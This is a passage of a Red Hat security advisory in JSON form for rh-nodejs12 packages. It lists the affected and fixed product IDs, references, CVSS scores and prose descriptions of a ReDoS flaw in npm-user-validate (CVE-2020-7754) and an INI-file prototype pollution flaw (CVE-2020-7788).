"7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-7754" }, { "category": "external", "summary": "RHBZ#1892430", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1892430" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-7754", "url": "https://www.cve.org/CVERecord?id=CVE-2020-7754" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-7754", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7754" }, { "category": "external", "summary": "https://github.com/npm/npm-user-validate/security/advisories/GHSA-xgh6-85xh-479p", "url": "https://github.com/npm/npm-user-validate/security/advisories/GHSA-xgh6-85xh-479p" } ], "release_date": "2020-10-16T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-11T13:37:42+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0485" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "version": "3.0" }, "products": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "nodejs-npm-user-validate: improper input validation when validating user emails leads to ReDoS" }, { "cve": "CVE-2020-7788", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2020-12-11T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1907444" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs-ini. If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-ini: Prototype pollution via malicious INI file", "title": "Vulnerability summary" }, { "category": "other", "text": "Node.JS packages in Red Hat Enterprise Linux and Red Hat Software Collections included the vulnerable dependency packaged in \"nodejs-npm\" component. Processing malicious files using npm could potentially trigger this vulnerability. The \"ini\" package bundled with npm was not in the library path where it could be included directly in other programs.\n\nThe nodejs-nodemon packages in Red Hat Enterprise Linux and Red Hat Software Collections are affected by this vulnerability as they bundle the nodejs-ini library. Usage of that library is governed by nodemon itself, so applications started by nodemon are not impacted. Further, nodemon is a developer tool not intended to be used in production.\n\nThe ini package is included in Red Hat Quay by protractor and webpack-cli, both of which are dev dependencies.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64" ] }, "references": [ { "category": "self", "summary": 